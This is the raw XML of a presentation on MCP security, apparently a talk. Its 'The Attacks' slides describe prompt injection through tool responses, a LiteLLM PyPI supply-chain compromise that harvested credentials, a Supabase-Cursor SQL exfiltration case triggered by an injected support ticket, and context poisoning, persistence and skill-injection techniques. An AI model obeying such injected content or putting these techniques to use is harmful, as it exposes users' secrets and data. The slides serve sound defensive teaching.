              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MCP tools fetch external data (issues, tickets, emails, docs) and return it to the AI</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If that data contains prompt injection, the AI executes it as instructions</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The user never sees the raw response - only the AI's (now-compromised) output</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="146" name="Google Shape;146;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="946200" y="359875"/>
            <a:ext cx="3759000" cy="468000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" spcFirstLastPara="1" rIns="0" wrap="square" tIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="1C1917"/>
                </a:solidFill>
                <a:latin typeface="Geist Medium"/>
                <a:ea typeface="Geist Medium"/>
                <a:cs typeface="Geist Medium"/>
                <a:sym typeface="Geist Medium"/>
              </a:rPr>
              <a:t>The Attacks</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:solidFill>
                <a:srgbClr val="1C1917"/>
              </a:solidFill>
              <a:latin typeface="Geist Medium"/>
              <a:ea typeface="Geist Medium"/>
              <a:cs typeface="Geist Medium"/>
              <a:sym typeface="Geist Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="147" name="Google Shape;147;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="946200" y="827875"/>
            <a:ext cx="6412200" cy="2772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en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="474441"/>
                </a:solidFill>
                <a:latin typeface="Geist Medium"/>
                <a:ea typeface="Geist Medium"/>
                <a:cs typeface="Geist Medium"/>
                <a:sym typeface="Geist Medium"/>
              </a:rPr>
              <a:t>2. Tool Poisoning (via Responses)</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="474441"/>
              </a:solidFill>
              <a:latin typeface="Geist Medium"/>
              <a:ea typeface="Geist Medium"/>
              <a:cs typeface="Geist Medium"/>
              <a:sym typeface="Geist Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="148" name="Google Shape;148;p24"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2055563" y="2999250"/>
            <a:ext cx="5032868" cy="17472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2" name="Shape 152"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="153" name="Google Shape;153;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="946200" y="359875"/>
            <a:ext cx="3759000" cy="468000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" spcFirstLastPara="1" rIns="0" wrap="square" tIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="1C1917"/>
                </a:solidFill>
                <a:latin typeface="Geist Medium"/>
                <a:ea typeface="Geist Medium"/>
                <a:cs typeface="Geist Medium"/>
                <a:sym typeface="Geist Medium"/>
              </a:rPr>
              <a:t>The Attacks</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:solidFill>
                <a:srgbClr val="1C1917"/>
              </a:solidFill>
              <a:latin typeface="Geist Medium"/>
              <a:ea typeface="Geist Medium"/>
              <a:cs typeface="Geist Medium"/>
              <a:sym typeface="Geist Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="154" name="Google Shape;154;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="946200" y="827875"/>
            <a:ext cx="6412200" cy="2772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en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="474441"/>
                </a:solidFill>
                <a:latin typeface="Geist Medium"/>
                <a:ea typeface="Geist Medium"/>
                <a:cs typeface="Geist Medium"/>
                <a:sym typeface="Geist Medium"/>
              </a:rPr>
              <a:t>3. Supply Chain Compromise</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="474441"/>
              </a:solidFill>
              <a:latin typeface="Geist Medium"/>
              <a:ea typeface="Geist Medium"/>
              <a:cs typeface="Geist Medium"/>
              <a:sym typeface="Geist Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="155" name="Google Shape;155;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="550350" y="1433650"/>
            <a:ext cx="8642700" cy="241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chemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LiteLLM on PyPI (March 2026):</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Maintainer account compromised, malicious versions published to PyPI (97M monthly downloads)</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Payload: .pth file executes on every Python startup - no import needed</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Harvested SSH keys, AWS creds, Kubernetes tokens, crypto wallets, .env files</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Spread through MCP servers via unpinned `uvx` dependencies - auto-downloaded on every run</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Discovered by accident: a bug in the malware (fork bomb) crashed the machine</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="156" name="Google Shape;156;p25"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6338589" y="197050"/>
            <a:ext cx="2484112" cy="1465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0" name="Shape 160"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="161" name="Google Shape;161;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="946200" y="359875"/>
            <a:ext cx="3759000" cy="468000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" spcFirstLastPara="1" rIns="0" wrap="square" tIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="1C1917"/>
                </a:solidFill>
                <a:latin typeface="Geist Medium"/>
                <a:ea typeface="Geist Medium"/>
                <a:cs typeface="Geist Medium"/>
                <a:sym typeface="Geist Medium"/>
              </a:rPr>
              <a:t>The Attacks</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:solidFill>
                <a:srgbClr val="1C1917"/>
              </a:solidFill>
              <a:latin typeface="Geist Medium"/>
              <a:ea typeface="Geist Medium"/>
              <a:cs typeface="Geist Medium"/>
              <a:sym typeface="Geist Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="162" name="Google Shape;162;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="946200" y="827875"/>
            <a:ext cx="6412200" cy="2772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en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="474441"/>
                </a:solidFill>
                <a:latin typeface="Geist Medium"/>
                <a:ea typeface="Geist Medium"/>
                <a:cs typeface="Geist Medium"/>
                <a:sym typeface="Geist Medium"/>
              </a:rPr>
              <a:t>4. Data Exfiltration</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="474441"/>
              </a:solidFill>
              <a:latin typeface="Geist Medium"/>
              <a:ea typeface="Geist Medium"/>
              <a:cs typeface="Geist Medium"/>
              <a:sym typeface="Geist Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="163" name="Google Shape;163;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="550350" y="1433650"/>
            <a:ext cx="8642700" cy="241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chemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Supabase MCP + Cursor ("the lethal trifecta"):</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Agent connected with service_role key -- bypasses all Row-Level Security</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Prompt injection via support ticket content triggered SQL exfiltration</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Full database and token access demonstrated by researchers</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="164" name="Google Shape;164;p26"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6536400" y="2783150"/>
            <a:ext cx="2278575" cy="22785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8" name="Shape 168"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="169" name="Google Shape;169;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="550350" y="1433650"/>
            <a:ext cx="8642700" cy="241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chemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Context Poisoning: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tool lies to the AI about what's happening - corrupts the agent's world model</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Shadow Persistence: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hidden webhooks, scheduled tasks that outlive the session, shadow skills</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Skill Injection: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bidirectional overrides, zero-width chars, pipe-to-shell, credential access patterns hidden in markdown skill files - no process to catch</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="170" name="Google Shape;170;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="946200" y="359875"/>
            <a:ext cx="3759000" cy="468000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" spcFirstLastPara="1" rIns="0" wrap="square" tIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="1C1917"/>
                </a:solidFill>
                <a:latin typeface="Geist Medium"/>
                <a:ea typeface="Geist Medium"/>
                <a:cs typeface="Geist Medium"/>
                <a:sym typeface="Geist Medium"/>
              </a:rPr>
              <a:t>The Attacks</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:solidFill>
                <a:srgbClr val="1C1917"/>
              </a:solidFill>
              <a:latin typeface="Geist Medium"/>
              <a:ea typeface="Geist Medium"/>
              <a:cs typeface="Geist Medium"/>
              <a:sym typeface="Geist Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="171" name="Google Shape;171;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="946200" y="827875"/>
            <a:ext cx="6412200" cy="2772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en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="474441"/>
                </a:solidFill>
                <a:latin typeface="Geist Medium"/>
                <a:ea typeface="Geist Medium"/>
                <a:cs typeface="Geist Medium"/>
                <a:sym typeface="Geist Medium"/>
              </a:rPr>
              <a:t>5. Context Poisoning, Persistence &amp; Skill Injection</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="474441"/>
              </a:solidFill>
              <a:latin typeface="Geist Medium"/>
              <a:ea typeface="Geist Medium"/>
              <a:cs typeface="Geist Medium"/>
              <a:sym typeface="Geist Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="172" name="Google Shape;172;p27"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6389550" y="2752050"/>
            <a:ext cx="2391450" cy="23914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6" name="Shape 176"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="177" name="Google Shape;177;p28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="550350" y="1433650"/>
            <a:ext cx="8642700" cy="241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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MCP01 - Token Mismanagement</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MCP02 - Privilege Escalation via Scope Creep</a:t>
            </a:r>
